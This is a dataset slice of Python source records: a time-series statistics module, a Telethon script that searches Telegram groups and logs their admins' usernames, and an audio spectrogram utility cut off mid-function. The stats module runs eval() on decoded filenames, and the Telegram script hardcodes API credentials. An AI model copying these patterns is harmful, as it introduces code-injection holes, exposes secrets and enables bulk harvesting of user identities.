"numpy.where", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.sinh", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 381, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 390, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 391, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 391, "usage_type": "call"}, {"api_name": "transformations.UnitVector.invtransform_v", "line_number": 395, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 395, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 401, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 403, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 405, "usage_type": "call"}, {"api_name": "numpy.testing.suppress_warnings", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 413, "usage_type": "attribute"}, {"api_name": "doctest.NORMALIZE_WHITESPACE", "line_number": 415, "usage_type": "attribute"}, {"api_name": "doctest.ELLIPSIS", "line_number": 415, "usage_type": "attribute"}, {"api_name": "doctest.testmod", "line_number": 417, "usage_type": "call"}]}
+{"seq_id": "14334605091", "text": "#!/usr/bin/python\n# pylint: disable=line-too-long\n\"\"\"\nmodule to work with TimeseriesArrayStatistics\n\nautomatically calculates all TimeseriesStats for every Timeseries in TimeseriesArray\nat initialization\n\"\"\"\nimport sys\nimport json\nimport base64\nimport os\nimport logging\n# own modules\nfrom TimeseriesStats import TimeseriesStats as TimeseriesStats\nfrom CustomExceptions import *\n\n#################### hack begin ##########################\n\"\"\"\nhack to mimic some python 2.x behaviour is string\nrepresentation of tuples\n\"\"\"\ndef _b64encode_p3(list_obj):\n if len(list_obj) == 1:\n start =\"(u'\" + list_obj[0] + \"',)\"\n else:\n start =\"(u'\" + \"', u'\".join((str(key) for key in list_obj)) + \"')\"\n encoded = base64.urlsafe_b64encode(start.encode(\"utf-8\")).decode(\"utf-8\")\n #print(\"%s -> %s -> %s\" % (list_obj, encoded, b64decode(encoded)))\n return encoded\n\ndef _b64encode_p2(list_obj):\n encoded = base64.urlsafe_b64encode(unicode(tuple(list_obj))).decode(\"utf-8\")\n #print(\"%s -> %s -> %s\" % (list_obj, encoded, b64decode(encoded)))\n return encoded\n\ndef _b64decode(encoded):\n decoded = base64.b64decode(encoded).decode(\"utf-8\")\n #print(\"%s -> %s\" % (encoded, decoded))\n return decoded\n\n\nif sys.version_info < (3,0):\n print(\"using python 2 coding funtions\")\n b64encode = _b64encode_p3\n b64decode = _b64decode\nelse:\n b64encode = _b64encode_p3\n b64decode = _b64decode\n##################### hack end ###########################\n\n\nclass TimeseriesArrayStats(object):\n \"\"\"\n hold dictionary of TimeseriesStats objects\n \"\"\"\n\n def __init__(self, tsa):\n \"\"\"\n creates TimeseriesStat objects for every key in given TimeseriesArray object\n index_keys and value_keys are used from given TimeseriesArray object\n\n parameters:\n tsa \n \"\"\"\n # define instance data\n self.__stats = {}\n self.__index_keynames = tuple(tsa.index_keynames)\n self.__value_keynames = tuple(tsa.value_keynames)\n for index_key in tsa.keys():\n try:\n self.__stats[index_key] = TimeseriesStats(tsa[index_key])\n except TimeseriesEmptyError as exc:\n logging.info(\"Timeseries for key %s is length zero, skipping\", index_key)\n\n def __str__(self):\n return json.dumps(self.to_data(), indent=4, sort_keys=True)\n\n to_json = __str__\n\n def __eq__(self, other):\n try:\n assert self.__index_keynames == other.index_keynames\n assert self.__value_keynames == other.value_keynames\n assert len(self.__stats.keys()) == len(other.stats.keys())\n for key in self.__stats.keys():\n assert self.__stats[key] == other.stats[key]\n except AssertionError as exc:\n logging.exception(exc)\n return False\n return True\n\n def __len__(self):\n return len(self.__stats.keys())\n\n def __getitem__(self, key):\n return self.__stats[key]\n\n def __delitem__(self, key):\n del self.__stats[key]\n\n def keys(self):\n return self.__stats.keys()\n\n def values(self):\n return self.__stats.values()\n\n def items(self):\n return self.__stats.items()\n\n @property\n def stats(self):\n return self.__stats\n\n @stats.setter\n def stats(self, value):\n self.__stats = value\n\n @property\n def index_keynames(self):\n return self.__index_keynames\n\n @index_keynames.setter\n def index_keynames(self, value):\n self.__index_keynames = value\n\n @property\n def value_keynames(self):\n return self.__value_keynames\n\n @value_keynames.setter\n def value_keynames(self, value):\n self.__value_keynames = value\n\n def slice(self, value_keys):\n \"\"\"\n remove all values_keys not 
in value_keys, and return new TimeseriesArrayStats object\n \"\"\"\n assert all((value_key in self.__value_keynames for value_key in value_keys))\n outdata = []\n outdata.append(self.__index_keynames)\n outdata.append(value_keys)\n tsstat_data = []\n for key, tsstat in self.__stats.items():\n data = {}\n for value_key in value_keys:\n data[value_key] = tsstat[value_key]\n tsstat_data.append((key, json.dumps(data)))\n outdata.append(tsstat_data)\n new_tsastat = TimeseriesArrayStats.from_json(json.dumps(outdata))\n return new_tsastat\n\n def get_stats(self, value_key, stat_func_name=None):\n \"\"\"\n returns dictionary of stats of every Timeseries object in Array for this\n specific value_key only\n\n parameters:\n value_key must be in self.value_keys\n stat_func_name must be in self.stat_func_names or None\n\n returns:\n \n \"\"\"\n assert value_key in self.__value_keynames\n if stat_func_name is not None:\n assert stat_func_name in TimeseriesStats.get_stat_func_names()\n ret_data = {}\n for key, t_stat in self.__stats.items():\n if stat_func_name is not None:\n ret_data[key] = t_stat.stats[value_key][stat_func_name]\n else:\n ret_data[key] = t_stat.stats[value_key]\n return ret_data\n\n @staticmethod\n def _get_tsstat_dumpfilename(key):\n \"\"\"\n create filename for stored or to be stored TimeseriesStats objects\n from given key\n key will be base64 encoded\n\n parameters:\n key \n\n returns:\n \n \"\"\"\n return \"tsstat_%s.json\" % b64encode(key)\n\n @staticmethod\n def get_dumpfilename(index_keys):\n \"\"\"\n create filename for stored or to be stored TimeseriesArrayStats\n from given index_keys\n index_keys will be base64 encoded\n\n parameters:\n index_keys \n\n returns:\n \n \"\"\"\n return \"tsastat_%s.json\" % b64encode(index_keys)\n\n def dump(self, outpath, overwrite=False):\n \"\"\"\n dump internal data to json file\n the filename is automatically created from index_keys\n\n parameters:\n outpath path where the json file will be placed\n overwrite whether or not an existing file should be overwritten\n \"\"\"\n #logging.info(\"index_keys: %s\", self.__index_keynames)\n outfilename = os.path.join(outpath, self.get_dumpfilename(self.__index_keynames))\n outdata = {\n \"index_keys\" : self.__index_keynames,\n \"value_keys\" : self.__value_keynames,\n \"tsstat_filenames\" : []\n }\n for key, tsstats in self.__stats.items():\n filename = self._get_tsstat_dumpfilename(key)\n fullfilename = os.path.join(outpath, filename)\n if (not os.path.isfile(fullfilename)) or (overwrite is True):\n with open(fullfilename, \"wt\") as outfile:\n tsstats.dump(outfile)\n outdata[\"tsstat_filenames\"].append(filename)\n with open(outfilename, \"wt\") as outfile:\n json.dump(outdata, outfile)\n\n @staticmethod\n def _filtermatch(key_dict, filterkeys, matchtype):\n \"\"\"\n key_dict is the whole index key, aka\n {hostname : test, instance:1, other:2}\n\n filterkeys is a part of it\n {hostname : test}\n \"\"\"\n assert matchtype in (\"and\", \"or\")\n matched = 0\n for key in filterkeys.keys():\n if key_dict[key] == filterkeys[key]:\n matched += 1\n # every key must match at AND\n if (matchtype == \"and\") and (matched == len(filterkeys.keys())):\n return True\n # at least one key must match at OR\n elif (matchtype == \"or\") and (matched > 0):\n return True\n return False\n\n @staticmethod\n def _get_load_filenames(path, index_keys, filterkeys=None, matchtype=\"and\"):\n \"\"\"\n filterkeys could be a part of existing index_keys\n all matching keys will be used\n \"\"\"\n tsastat_filename = 
TimeseriesArrayStats.get_dumpfilename(index_keys)\n logging.debug(\"tsastat_filename: %s\", tsastat_filename)\n with open(os.path.join(path, tsastat_filename), \"rt\") as infile:\n data = json.load(infile)\n logging.debug(\"loaded json data\")\n logging.debug(\"index_keys: %s\", data[\"index_keys\"])\n logging.debug(\"value_keys: %s\", data[\"value_keys\"])\n logging.debug(\"number of ts files: %s\", len(data[\"tsstat_filenames\"]))\n filenames = {}\n for filename in data[\"tsstat_filenames\"]:\n logging.debug(\"reading key for tsstat from file %s\", filename)\n enc_key = filename.split(\".\")[0][7:] # only this pattern tsstat_(.*).json\n key = eval(b64decode(str(enc_key))) # must be str not unicode\n key_dict = dict(zip(index_keys, key))\n if filterkeys is not None:\n if TimeseriesArrayStats._filtermatch(key_dict, filterkeys, matchtype):\n logging.debug(\"adding tsastat key : %s\", key)\n filenames[key] = os.path.join(path, filename)\n else:\n # no filterkeys means every file is added\n logging.debug(\"adding tsa key : %s\", key)\n filenames[key] = os.path.join(path, filename)\n return filenames\n\n @staticmethod\n def load(path, index_keys, filterkeys=None, matchtype=\"and\"):\n \"\"\"\n load stored json file (with dump() created) and return TimeseriesArrayStats object\n\n parameters:\n path path to search for stored json file, the filename is automatically created from given index_keys\n index_keys list of index_keys\n\n returns:\n \n \"\"\"\n #logging.info(\"index_keys: %s\", index_keys)\n infilename = os.path.join(path, TimeseriesArrayStats.get_dumpfilename(index_keys))\n try:\n fh = open(infilename, \"rb\")\n indata = json.load(fh)\n except Exception as exc:\n logging.exception(exc)\n logging.error(\"something went wrong while loading %s\", infilename)\n raise exc\n #logging.info(\"loaded JSON data: %s\", indata)\n tsastats = TimeseriesArrayStats.__new__(TimeseriesArrayStats)\n tsastats.__index_keynames = tuple(indata[\"index_keys\"])\n tsastats.__value_keynames = tuple(indata[\"value_keys\"])\n tsastats.__stats = {}\n #for filename in indata[\"tsstat_filenames\"]:\n for key, filename in tsastats._get_load_filenames(path, index_keys, filterkeys, matchtype).items():\n #logging.info(\"loading TimeseriesStats object from %s\", fullfilename)\n with open(filename, \"rt\") as infile:\n tsastats.__stats[key] = TimeseriesStats.load(infile)\n return tsastats\n\n def to_data(self):\n \"\"\"\n full data will be 3 dimensional, so this method returns only structure,\n use get_stats to get 2-dimensional data of specific value_keyname\n \"\"\"\n ret_data = {\n \"index_keynames\" : self.__index_keynames,\n \"value_keynames\" : self.__value_keynames,\n \"tsstats_filenames\" : [self._get_tsstat_dumpfilename(key) for key in self.__stats.keys()],\n \"tsastats_filename\" : self.get_dumpfilename(self.__index_keynames)\n }\n return ret_data\n\n def to_json(self):\n \"\"\"\n full data will be 3 dimensional, so this method returns only structure,\n use get_stats to get 2-dimensional data of specific value_keyname\n \"\"\"\n ret_data = [\n self.__index_keynames,\n self.__value_keynames,\n [(key, timeseries.stats) for key, timeseries in self.__stats.items()]\n ]\n return json.dumps(ret_data)\n\n @staticmethod\n def from_json(jsondata):\n indata = json.loads(jsondata)\n tsastats = TimeseriesArrayStats.__new__(TimeseriesArrayStats)\n tsastats.__index_keynames = tuple(indata[0])\n tsastats.__value_keynames = tuple(indata[1])\n tsastats.__stats = {}\n for key, tsstats in indata[2]:\n # from json there are only 
lists, but these are not hashable,\n # so convert key to tuple\n tsastats.__stats[tuple(key)] = TimeseriesStats.from_json(json.dumps(tsstats))\n return tsastats\n\n def to_csv(self, stat_func_name, sortkey=None, reverse=True):\n \"\"\"\n return csv table of data for one specific statistical function\n\n first column is always the identifying key of this TimeseriesStat as string\n mainly used in websites to get easy access to the key of this row\n \"\"\"\n yield (\"#key\", ) + self.__index_keynames + self.__value_keynames\n data = None\n if sortkey is not None:\n data = sorted(self.__stats.items(), key=lambda item: item[1][sortkey][stat_func_name], reverse=reverse)\n else:\n data = self.__stats.items()\n for key, value in data:\n values = list(key) + [value[value_key][stat_func_name] for value_key in self.__value_keynames]\n yield (str(key), ) + tuple(values)\n", "repo_name": "gunny26/datalogger", "sub_path": "datalogger/TimeseriesArrayStats.py", "file_name": "TimeseriesArrayStats.py", "file_ext": "py", "file_size_in_byte": 13175, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base64.urlsafe_b64encode", "line_number": 28, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64encode", "line_number": 33, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.version_info", "line_number": 43, "usage_type": "attribute"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 72, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 74, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 77, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 89, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 148, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 150, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats.get_stat_func_names", "line_number": 167, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 167, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 230, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 261, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 262, "usage_type": "call"}, {"api_name": "os.path", "line_number": 262, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 263, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 264, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 265, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 266, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 267, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 270, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 276, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path", "line_number": 277, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 280, 
"usage_type": "call"}, {"api_name": "os.path.join", "line_number": 281, "usage_type": "call"}, {"api_name": "os.path", "line_number": 281, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 297, "usage_type": "call"}, {"api_name": "os.path", "line_number": 297, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 300, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 302, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 303, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats.load", "line_number": 314, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 314, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 340, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 344, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats.from_json", "line_number": 352, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 352, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 352, "usage_type": "call"}]}
+{"seq_id": "1117537674", "text": "from telethon.sync import TelegramClient, events\nfrom telethon.tl.types import ChannelParticipantsAdmins\nfrom telethon import functions\nfrom time import sleep\nfrom random import randint\nimport pathlib\nfrom telethon.tl.types import ChannelParticipantsAdmins\n\n# Clients data\napi_id = 1454150\napi_hash = \"6bb467eaad074e28b7bfec3ad1a75d83\"\n\n# enter phone number as a session name\nsession_name = \"37255937683.session\"\n\nsearch_keyword_file = 'lists/search_keywords.txt'\n\n# True = for only groups\n# False = for groups and channels\nsearch_only_groups = True\n\noutput_file_name = 'lists/search_results_output.csv'\n\nprint(\"[+] Script started\")\n\ntry:\n keyword_list = []\n with open(search_keyword_file) as fp:\n temp_list = fp.read().strip().split(\"\\n\")\n for i in temp_list:\n if not i.strip() == '':\n keyword_list.append(i.strip())\n print(f\"[+] Sucessfully got keywords from '{search_keyword_file}'\")\nexcept Exception as e:\n print(f\"[-] Error Occured while reading '{search_keyword_file}'\")\n print(f\"[-] Error : {e}\")\n exit()\n\ndef add_data_to_output_file(keyword, data):\n if not pathlib.Path(output_file_name).exists():\n with open(output_file_name, 'w') as fw:\n fw.write(\"Keyword,Type,Title,Username,Participants,Admins\")\n new_data = ''\n for i in data:\n new_data += f'\\n{keyword},{i}'\n with open(output_file_name, 'a') as fw:\n fw.write(new_data)\n\n# add_data_to_output_file(keyword_list)\n# exit()\n\n# logining to phone\nclient = TelegramClient(session_name, api_id, api_hash).start(phone=session_name)\nif not client.is_user_authorized():\n print(\"\\n[-] Error occured while signing in, delete session file and try again.\")\n exit()\n\nprint(\"[+] Sucessfully logged in\\n\")\nprint(f\"[+] Total keywords found in file : {len(keyword_list)}\\n\")\n\n\n\nasync def main():\n for index, keyword in enumerate(keyword_list):\n print(f\"[{index+1}] {keyword}\")\n result = await client(functions.contacts.SearchRequest(\n q=keyword,\n limit=100\n ))\n # print(result.stringify())\n data = []\n for i in result.chats:\n if i.megagroup:\n chat_type = \"group\"\n chat_admins = \"\"\n try:\n async for user in client.iter_participants(i.username, filter=ChannelParticipantsAdmins):\n if not user.bot:\n if chat_admins:\n chat_admins += f\"|{user.first_name}({user.username})\"\n else:\n chat_admins = f\"{user.first_name}({user.username})\"\n except:\n chat_admins = \"None\"\n data.append(f\"{chat_type},{i.title},{i.username},{i.participants_count},{chat_admins}\")\n else:\n chat_type = \"channel\"\n chat_admins = \"None\"\n if not search_only_groups:\n data.append(f\"{chat_type},{i.title},{i.username},{i.participants_count},{chat_admins}\")\n add_data_to_output_file(keyword, data)\n sleep(randint(1,3))\n print(\"\\n[+] All keyword done, terminating script\")\n\nclient.loop.run_until_complete(main())", "repo_name": "JacobZoarets/tgAdminCode", "sub_path": "12.search_groups_channels.py", "file_name": "12.search_groups_channels.py", "file_ext": "py", "file_size_in_byte": 3242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 40, "usage_type": "call"}, {"api_name": "telethon.sync.TelegramClient", "line_number": 53, "usage_type": "call"}, {"api_name": "telethon.functions.contacts.SearchRequest", "line_number": 66, "usage_type": "call"}, {"api_name": "telethon.functions.contacts", "line_number": 66, "usage_type": "attribute"}, {"api_name": 
"telethon.functions", "line_number": 66, "usage_type": "name"}, {"api_name": "telethon.tl.types.ChannelParticipantsAdmins", "line_number": 77, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 92, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 92, "usage_type": "call"}]}
+{"seq_id": "33911825218", "text": "import os\nimport numpy as np\nimport matplotlib\nimport nlpaug.augmenter.audio as naa\nimport matplotlib.pyplot as plt\nimport librosa.display\nimport librosa.filters\nimport multiprocessing\nimport soundfile as sf\n\ntry:\n from constants import model_params, base_data_path\n from constants import *\nexcept ModuleNotFoundError:\n from .constants import model_params, base_data_path\n from .constants import *\n\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom tqdm import tqdm\nfrom joblib import Parallel, delayed\nfrom scipy import signal\nfrom scipy.io import wavfile\nfrom skopt import gp_minimize\nfrom skopt.space import Real\nfrom functools import partial\nfrom pydub import AudioSegment\n# from keras.utils import multi_gpu_model\n\n# Set a random seed for numpy for reproducibility\nnp.random.seed(42)\n\nif os.environ.get('DISPLAY', '') == '':\n print('no display found. Using non-interactive Agg backend')\n matplotlib.use('Agg')\n\ntry:\n import foundations\nexcept Exception as e:\n print(e)\n\n\ndef load_wav(path, sr):\n return librosa.core.load(path, sr=sr)[0]\n\n\ndef save_wav(wav, path, sr):\n wav *= 32767 / max(0.01, np.max(np.abs(wav)))\n # proposed by @dsmiller\n wavfile.write(path, sr, wav.astype(np.int16))\n\n\ndef save_wavenet_wav(wav, path, sr, inv_preemphasize, k):\n # wav = inv_preemphasis(wav, k, inv_preemphasize)\n wav *= 32767 / max(0.01, np.max(np.abs(wav)))\n wavfile.write(path, sr, wav.astype(np.int16))\n\n\ndef preemphasis(wav, k, preemphasize=True):\n if preemphasize:\n return signal.lfilter([1, -k], [1], wav)\n return wav\n\n\ndef inv_preemphasis(wav, k, inv_preemphasize=True):\n if inv_preemphasize:\n return signal.lfilter([1], [1, -k], wav)\n return wav\n\n\n# From https://github.com/r9y9/wavenet_vocoder/blob/master/audio.py\ndef start_and_end_indices(quantized, silence_threshold=2):\n assert quantized.size > 0\n start, end = 0, quantized.size - 1\n\n for start in range(quantized.size):\n if abs(quantized[start] - 127) > silence_threshold:\n break\n\n for end in range(quantized.size - 1, 1, -1):\n if abs(quantized[end] - 127) > silence_threshold:\n break\n\n assert abs(quantized[start] - 127) > silence_threshold\n assert abs(quantized[end] - 127) > silence_threshold\n\n return start, end\n\n\ndef trim_silence(wav, hparams):\n \"\"\"\n Trim leading and trailing silence\n Useful for M-AILABS dataset if we choose to trim\n the extra 0.5 silence at beginning and end.\n\n Thanks @begeekmyfriend and @lautjy for pointing out\n the params contradiction. 
These params are separate\n and tunable per dataset.\n \"\"\"\n return librosa.effects.trim(\n wav, top_db=hparams.trim_top_db,\n frame_length=hparams.trim_fft_size,\n hop_length=hparams.trim_hop_size\n )[0]\n\n\ndef get_hop_size(hparams):\n hop_size = hparams.hop_size\n if hop_size is None:\n assert hparams.frame_shift_ms is not None\n hop_size = int(\n hparams.frame_shift_ms / 1000 * hparams.sample_rate\n )\n return hop_size\n\n\ndef linearspectrogram(wav, hparams):\n D = _stft(wav, hparams)\n S = (\n _amp_to_db(np.abs(D) ** hparams.magnitude_power, hparams) -\n hparams.ref_level_db\n )\n\n if hparams.signal_normalization:\n return _normalize(S, hparams)\n return S\n\n\ndef melspectrogram(wav, hparams):\n D = _stft(wav, hparams)\n S = _amp_to_db(_linear_to_mel(\n np.abs(D) ** hparams.magnitude_power, hparams\n ), hparams) - hparams.ref_level_db\n\n if hparams.signal_normalization:\n return _normalize(S, hparams)\n\n return S\n\n\ndef inv_linear_spectrogram(linear_spectrogram, hparams):\n \"\"\"\n Converts linear spectrogram to waveform using librosa\n \"\"\"\n if hparams.signal_normalization:\n D = _denormalize(linear_spectrogram, hparams)\n else:\n D = linear_spectrogram\n\n # Convert back to linear\n S = (\n _db_to_amp(D + hparams.ref_level_db) **\n (1 / hparams.magnitude_power)\n )\n\n if hparams.use_lws:\n processor = _lws_processor(hparams)\n D = processor.run_lws(\n S.astype(np.float64).T ** hparams.power\n )\n y = processor.istft(D).astype(np.float32)\n return inv_preemphasis(\n y, hparams.preemphasis, hparams.preemphasize\n )\n else:\n return inv_preemphasis(\n _griffin_lim(S ** hparams.power, hparams),\n hparams.preemphasis, hparams.preemphasize\n )\n\n\ndef inv_mel_spectrogram(mel_spectrogram, hparams):\n \"\"\"\n Converts mel spectrogram to waveform using librosa\n \"\"\"\n if hparams.signal_normalization:\n D = _denormalize(mel_spectrogram, hparams)\n else:\n D = mel_spectrogram\n\n S = _mel_to_linear(\n _db_to_amp(D + hparams.ref_level_db) **\n (1 / hparams.magnitude_power),\n hparams\n ) # Convert back to linear\n\n if hparams.use_lws:\n processor = _lws_processor(hparams)\n D = processor.run_lws(\n S.astype(np.float64).T ** hparams.power\n )\n y = processor.istft(D).astype(np.float32)\n return inv_preemphasis(\n y, hparams.preemphasis, hparams.preemphasize\n )\n else:\n return inv_preemphasis(\n _griffin_lim(S ** hparams.power, hparams),\n hparams.preemphasis, hparams.preemphasize\n )\n\n\n# tensorflow Griffin-Lim\n# Thanks to @begeekmyfriend:\n# https://github.com/begeekmyfriend/Tacotron-2/blob/\n# mandarin-new/datasets/audio.py\n\ndef inv_linear_spectrogram_tensorflow(spectrogram, hparams):\n \"\"\"\n Builds computational graph to convert spectrogram\n to waveform using TensorFlow.\n Unlike inv_spectrogram, this does NOT invert the preemphasis.\n The caller should call\n inv_preemphasis on the output after running the graph.\n \"\"\"\n if hparams.signal_normalization:\n D = _denormalize_tensorflow(spectrogram, hparams)\n else:\n D = spectrogram\n\n S = tf.pow(\n _db_to_amp_tensorflow(D + hparams.ref_level_db),\n (1 / hparams.magnitude_power)\n )\n\n return _griffin_lim_tensorflow(\n tf.pow(S, hparams.power), hparams\n )\n\n\ndef inv_mel_spectrogram_tensorflow(mel_spectrogram, hparams):\n \"\"\"\n Builds computational graph to convert mel spectrogram\n to waveform using TensorFlow.\n Unlike inv_mel_spectrogram, this does NOT invert the preemphasis.\n The caller should call\n inv_preemphasis on the output after running the graph.\n \"\"\"\n if 
hparams.signal_normalization:\n D = _denormalize_tensorflow(mel_spectrogram, hparams)\n else:\n D = mel_spectrogram\n\n S = tf.pow(\n _db_to_amp_tensorflow(D + hparams.ref_level_db),\n (1 / hparams.magnitude_power)\n )\n # Convert back to linear\n S = _mel_to_linear_tensorflow(S, hparams)\n return _griffin_lim_tensorflow(\n tf.pow(S, hparams.power), hparams\n )\n\n\ndef _lws_processor(hparams):\n import lws\n return lws.lws(\n hparams.n_fft, get_hop_size(hparams),\n fftsize=hparams.win_size, mode=\"speech\"\n )\n\ndef _griffin_lim(S, hparams):\n \"\"\"\n liberos implementation of Griffin-Lim\n Based on https://github.com/librosa/librosa/issues/434\n \"\"\"\n angles = np.exp(2j * np.pi * np.random.rand(*S.shape))\n S_complex = np.abs(S).astype(np.complex)\n y = _istft(S_complex * angles, hparams)\n\n for i in range(hparams.griffin_lim_iters):\n angles = np.exp(1j * np.angle(_stft(y, hparams)))\n y = _istft(S_complex * angles, hparams)\n\n return y\n\n\ndef _griffin_lim_tensorflow(S, hparams):\n \"\"\"\n TensorFlow implementation of Griffin-Lim\n Based on https://github.com/Kyubyong/tensorflow-exercises\n /blob/master/Audio_Processing.ipynb\n \"\"\"\n\n with tf.variable_scope('griffinlim'):\n # TensorFlow's stft and istft operate on a\n # batch of spectrograms; create batch of size 1\n S = tf.expand_dims(S, 0)\n S_complex = tf.identity(tf.cast(S, dtype=tf.complex64))\n y = tf.contrib.signal.inverse_stft(\n S_complex, hparams.win_size, get_hop_size(hparams),\n hparams.n_fft\n )\n\n for i in range(hparams.griffin_lim_iters):\n est = tf.contrib.signal.stft(\n y, hparams.win_size, get_hop_size(hparams),\n hparams.n_fft\n )\n angles = est / tf.cast(\n tf.maximum(1e-8, tf.abs(est)), tf.complex64\n )\n y = tf.contrib.signal.inverse_stft(\n S_complex * angles, hparams.win_size,\n get_hop_size(hparams), hparams.n_fft\n )\n\n return tf.squeeze(y, 0)\n\n\ndef _stft(y, hparams):\n if hparams.use_lws:\n return _lws_processor(hparams).stft(y).T\n else:\n return librosa.stft(\n y=y, n_fft=hparams.n_fft,\n hop_length=get_hop_size(hparams),\n win_length=hparams.win_size,\n pad_mode='constant'\n )\n\n\ndef _istft(y, hparams):\n return librosa.istft(\n y, hop_length=get_hop_size(hparams),\n win_length=hparams.win_size\n )\n\n\n# Those are only correct when using lws!!!\n# (This was messing with Wavenet quality for a long time!)\ndef num_frames(length, fsize, fshift):\n \"\"\"\n Compute number of time frames of spectrogram\n \"\"\"\n pad = (fsize - fshift)\n if length % fshift == 0:\n M = (length + pad * 2 - fsize) // fshift + 1\n else:\n M = (length + pad * 2 - fsize) // fshift + 2\n return M\n\n\ndef pad_lr(x, fsize, fshift):\n \"\"\"\n Compute left and right padding\n \"\"\"\n M = num_frames(len(x), fsize, fshift)\n pad = (fsize - fshift)\n T = len(x) + 2 * pad\n r = (M - 1) * fshift + fsize - T\n return pad, pad + r\n\n\n# Librosa correct padding\ndef librosa_pad_lr(x, fsize, fshift, pad_sides=1):\n \"\"\"\n compute right padding (final frame) or both sides\n padding (first and final frames)\n \"\"\"\n assert pad_sides in (1, 2)\n # return int(fsize // 2)\n pad = (x.shape[0] // fshift + 1) * fshift - x.shape[0]\n\n if pad_sides == 1:\n return 0, pad\n else:\n return pad // 2, pad // 2 + pad % 2\n\n\n# Conversions\n_mel_basis = None\n_inv_mel_basis = None\n\n\ndef _linear_to_mel(spectogram, hparams):\n global _mel_basis\n if _mel_basis is None:\n _mel_basis = _build_mel_basis(hparams)\n return np.dot(_mel_basis, spectogram)\n\n\ndef _mel_to_linear(mel_spectrogram, hparams):\n global _inv_mel_basis\n if 
